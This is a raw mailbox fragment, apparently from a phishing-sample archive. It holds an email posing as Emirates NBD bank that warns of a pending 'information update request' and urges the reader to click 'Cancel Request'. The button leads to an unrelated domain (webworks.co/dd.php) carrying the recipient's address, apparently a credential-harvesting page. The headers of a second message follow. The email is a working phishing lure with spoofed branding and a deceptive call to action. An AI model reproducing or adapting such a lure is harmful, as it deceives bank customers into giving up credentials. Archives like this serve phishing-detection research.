From: <customercare@EmiratesNBD.com>
Date: Wed, 08 May 2019 20:36:23 -0700
Status: O
X-Status: 
X-Keywords:                  
X-UID: 108

You will not see this in a MIME-aware mail reader.
--===============0887858520==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =

    =

   	 =

   =

   =

Dear Customer,

Your information update request is under review.

If you didn't approve this request, Cancel below

 Cancel Request  =

 Emirates NBD Bank PJSC
 	 =

  =

	 =

   	 =

  =20
--===============0887858520==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><div style=3D"MAX-WIDTH: 600px; PADDING-BOTTOM: 4px;=
 PADDING-TOP: 4px; PADDING-LEFT: 4px; PADDING-RIGHT: 4px;">
    <table align=3D"center" border=3D"0" cellpadding=3D"0" cellspacing=3D"0=
" style=3D"BORDER-TOP: rgb(240,240,240) 1px solid; BORDER-RIGHT: rgb(240,24=
0,240) 1px solid; WIDTH: 100%; BORDER-BOTTOM: rgb(240,240,240) 1px solid; P=
ADDING-BOTTOM: 0px; PADDING-TOP: 45px; PADDING-LEFT: 45px; BORDER-LEFT: rgb=
(240,240,240) 1px solid; PADDING-RIGHT: 45px; BACKGROUND-COLOR: rgb(255,255=
,255);">
        <tbody>
            <tr>
                <td align=3D"center">
                    <table border=3D"0" cellspacing=3D"0" width=3D"100%">
                        <tbody>
                            <tr>
                                <td style=3D"FONT-SIZE: 0px; TEXT-ALIGN: le=
ft;" valign=3D"top"><img alt=3D"The EmiratesNBD logo" src=3D"http://www.abu=
dhabi2.com/wp-content/uploads/2015/08/emirates-ndb.jpg" height=3D"100" widt=
h=3D"400" class=3D"fr-fic fr-dib"></td>
                            </tr>
                        </tbody>
                    </table>
                    <table border=3D"0" cellpadding=3D"0" cellspacing=3D"0"=
 width=3D"100%">
                        <tbody>
                            <tr style=3D'FONT-SIZE: 16px; FONT-FAMILY: "Ope=
n Sans","HelveticaNeue-Light","Helvetica Neue Light","Helvetica Neue",Helve=
tica,Arial,"Lucida Grande",sans-serif; FONT-WEIGHT: 300; COLOR: rgb(64,64,6=
4); TEXT-ALIGN: left; LINE-HEIGHT: 26px;'>
                                <td><br>Dear Customer,<br><br>Your informat=
ion update request is under review.<br><br>If you didn't approve this reque=
st, Cancel below<br><br>
                                    <a
                                        href=3D"https://webworks.co/dd.php?=
email=3Djose@monkey.org" style=3D'FONT-SIZE: 15px; TEXT-DECORATION: none; M=
AX-WIDTH: 210px; FONT-FAMILY: "Open Sans","Helvetica Neue",Arial; WIDTH: 21=
0px; COLOR: white; PADDING-BOTTOM: 14px; TEXT-ALIGN: center; PADDING-TOP: 1=
4px; PADDING-LEFT: 7px; MARGIN: 0px; DISPLAY: block; PADDING-RIGHT: 7px; BA=
CKGROUND-COLOR: darkblue; border-radius: 4px;'
                                        target=3D"_blank">Cancel Request</a>
                                        <p>&nbsp;</p>
                                        <p>Emirates NBD Bank PJSC</p>
                                </td>
                            </tr>
                            <tr>
                                <td height=3D"40"><br></td>
                            </tr>
                        </tbody>
                    </table>
                </td>
            </tr>
        </tbody>
    </table>
</div></html>
--===============0887858520==--

From jose@monkey.org Sat May 11 02:17:11 2019 +0000
Return-Path: test3@nfb.mw
Delivered-To: jose@monkey.org
X-FDA: 75474685062.12.cream22_46bbf09ce859
X-Spam-Summary: 75,0,0,494211a87d2364f6,d41d8cd98f00b204,test3@nfb.mw,:,RULES_HIT:2:41:72:152:355:375:379:495:800:962:967:973:983:988:989:1189:1208:1224:1260:1261:1311:1313:1314:1345:1381:1431:1433:1434:1436:1437:1461:1513:1515:1516:1517:1521:1535:1567:1571:1588:1589:1592:1593:1594:1623:1685:1710:1714:1730:1747:1777:1792:2198:2199:2393:2525:2527:2543:2561:2564:2682:2685:2771:2859:2890:2911:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3867:3868:3871:3872:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4049:4119:4321:4425:5007:6248:6261:6650:6669:6674:6678:8557:8603:8607:8957:9025:9908:10004:10210:10234:10241:10346:11657:11658:11914:12043:12294:12438:12517:12519:12555:12955:12958:12967:12986:13139:13181:13229:13374:14096:14827:18000:21080:21212:21325:21433:21450:21451:21524:21554:21611:21627:21660:21810:21819,0,RBL:41.216.228.199-irl.urbl.hostedemail.com-127.0.0.175,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk
X-HE-Tag: cream22_46bbf09ce859
X-Filterd-Recvd-Size: 8426
Received: from mail.nfb.mw (netbanking.nfb.mw [41.216.228.199])
	by imf19.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Sat, 11 May 2019 02:17:10 +0000 (UTC)
Received: from localhost (localhost [127.0.0.1])
	by mail.nfb.mw (Postfix) with ESMTP id 13B4D225C4C
	for <jose@monkey.org>; Sat, 11 May 2019 04:17:14 +0200 (CAT)
Received: from mail.nfb.mw ([127.0.0.1])
	by localhost (mail.nfb.mw [127.0.0.1]) (amavisd-new, port 10032)
	with ESMTP id pdzy2NKOuSPT for <jose@monkey.org>;
	Sat, 11 May 2019 04:17:13 +0200 (CAT)
Received: from localhost (localhost [127.0.0.1])
	by mail.nfb.mw (Postfix) with ESMTP id 37A4022363D
	for <jose@monkey.org>; Sat, 11 May 2019 04:17:13 +0200 (CAT)
X-Virus-Scanned: amavisd-new at mail.nfb.mw
Received: from mail.nfb.mw ([127.0.0.1])
	by localhost (mail.nfb.mw [127.0.0.1]) (amavisd-new, port 10026)
	with ESMTP id iTQelEjO9o1e for <jose@monkey.org>;
	Sat, 11 May 2019 04:17:13 +0200 (CAT)
Received: from nfb.mw (unknown [84.38.133.139])
	by mail.nfb.mw (Postfix) with ESMTPSA id 52F17225C49
	for <jose@monkey.org>; Sat, 11 May 2019 04:17:12 +0200 (CAT)
